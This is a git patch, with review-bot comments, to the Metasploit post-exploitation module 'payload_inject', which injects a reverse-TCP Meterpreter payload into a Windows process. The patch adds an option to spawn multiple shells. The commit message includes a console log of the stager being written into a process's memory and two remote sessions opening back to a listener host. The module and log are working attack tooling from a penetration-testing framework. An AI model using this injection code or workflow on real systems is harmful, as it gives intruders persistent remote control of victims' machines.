From d208ab92609d0f54283d30f77699741626a4f7f5 Mon Sep 17 00:00:00 2001 
From: trustedsec Date: Wed, 9 Oct 2013 22:01:11 -0400 Subject: [PATCH] Added multiple payload capabilities Added support to specify multiple payload delivery options. msf post(payload_inject) > show options Module options (post/windows/manage/payload_inject): Name Current Setting Required Description ---- --------------- -------- ----------- AMOUNT 2 no Select the amount of shells you want to spawn. HANDLER false no Start an Exploit Multi Handler to receive the connection LHOST XXXXXXXX yes IP of host that will receive the connection from the payload. LPORT 4433 no Port for Payload to connect to. OPTIONS # no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process. PID no Process Identifier to inject of process to inject payload. SESSION 1 yes The session to run this module on. msf post(payload_inject) > set HANDLER true HANDLER => true msf post(payload_inject) > exploit [*] Running module against XXXXXXXX [*] Starting exploit multi handler [*] Performing Architecture Check [*] Started reverse handler on XXXXXXXX:4433 [*] Starting the payload handler... [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884 [*] Opening process 884 [*] Generating payload [*] Allocating memory in procees 884 [*] Allocated memory at address 0x003b0000, for 290 byte stager [*] Writing the stager into memory... 
[*] Sending stage (770048 bytes) to XXXXXXXX [+] Successfully injected payload in to process: 884 [*] Performing Architecture Check [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884 [*] Opening process 884 [*] Generating payload [*] Allocating memory in procees 884 [*] Allocated memory at address 0x00ba0000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected payload in to process: 884 [*] Post module execution completed msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400 [*] Sending stage (770048 bytes) to XXXXXXXX msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
---
 modules/post/windows/manage/payload_inject.rb | 39 +++++++++++--------
 1 file changed, 22 insertions(+), 17 deletions(-)
diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb
index 8985a7465c..31b3529ae8 100644
--- a/modules/post/windows/manage/payload_inject.rb
+++ b/modules/post/windows/manage/payload_inject.rb
@@ -7,9 +7,12 @@
 require 'msf/core'
 require 'rex'
+require 'msf/core/post/common'
 class Metasploit3 < Msf::Post
+ include Msf::Post::Common
+
 def initialize(info={})
 super( update_info( info,
 'Name' => 'Windows Manage Memory Payload Injection Module',
@@ -19,32 +22,28 @@ class Metasploit3 < Msf::Post
 using a reverse x86 TCP Meterpreter Payload.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'Carlos Perez '],
+ 'Author' => [ 'Carlos Perez ',
+ 'David Kennedy "ReL1K" ' # added multiple payload support
+ ],
 'Platform' => [ 'win' ],
 'SessionTypes' => [ 'meterpreter' ]
 ))
 register_options(
 [
- OptString.new('PAYLOAD',
- [false, 'Windows Payload to inject into memory of a process.',
- "windows/meterpreter/reverse_tcp"]),
- OptAddress.new('LHOST',
- [true, 'IP of host that will receive the connection from the payload.']),
- OptInt.new('LPORT',
- [false, 'Port for Payload to connect to.', 4433]),
- OptInt.new('PID',
- [false, 'Process Identifier to inject of process to inject payload.']),
- OptBool.new('HANDLER',
- [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
- OptString.new('OPTIONS',
- [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",
- ""])
- ], self.class)
+ OptString.new('PAYLOAD', [false, 'Windows Payload to inject into memory of a process.', "windows/meterpreter/reverse_tcp"]),
+ OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
+ OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
+ OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
+ OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
+ OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
+ OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
+ ], self.class)
 end
 # Run Method for when run command is issued
 def run
+ # syinfo is only on meterpreter sessions
 print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
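Review bot: The rewritten `OptString.new('OPTIONS', ...)` entry drops the `""` default that the removed lines carried, so `datastore['OPTIONS']` is now nil instead of an empty string whenever the user leaves it unset; `run` passes that value straight to `create_payload(pay_name,lhost,lport,opts)` in the following hunk, and whether that helper tolerates nil is not visible in this patch. Restoring the default keeps the old contract: `OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.", ""]),`. The new comment above `print_status` misspells the helper it refers to; `# sysinfo is only available on meterpreter sessions` would read correctly. The AMOUNT description should also state the accepted range, since nothing else documents it, e.g. `'Number of times to inject the payload (1 or more).'`.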
@@ -62,6 +61,7 @@ class Metasploit3 < Msf::Post
 opts = datastore['OPTIONS']
 # Create payload
 payload = create_payload(pay_name,lhost,lport,opts)
+
 if pid == 0 or not has_pid?(pid)
 pid = create_temp_proc(payload)
 end
@@ -71,7 +71,12 @@ class Metasploit3 < Msf::Post
 return false
 else
 create_multihand(payload,pay_name,lhost,lport) if datastore['HANDLER']
- inject_into_pid(payload,pid,datastore['NEWPROCESS'])
+
+ datastore['AMOUNT'].times do # iterate through number of shells
+
+ inject_into_pid(payload,pid,datastore['NEWPROCESS'])
+
+ end
 end
 end
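Review bot: Nothing validates `datastore['AMOUNT']` before `datastore['AMOUNT'].times do`; the OptInt declared earlier in the patch accepts 0 or a negative value, in which case `create_multihand` has already started a handler and the module then returns without injecting anything and without reporting why. A guard near the top of `run` makes the failure explicit: `if datastore['AMOUNT'].to_i < 1` / `print_error('AMOUNT must be 1 or greater'); return false` / `end`. As a point of style, the block body is a single call padded by three blank lines and a comment that restates the code, so `datastore['AMOUNT'].times { inject_into_pid(payload,pid,datastore['NEWPROCESS']) }` says the same in one line. Note that when PID is unset, `create_temp_proc` in the preceding hunk runs once outside the loop, so every iteration targets the same process; if that is intended it belongs in the AMOUNT description. The body of `run` begins outside this hunk.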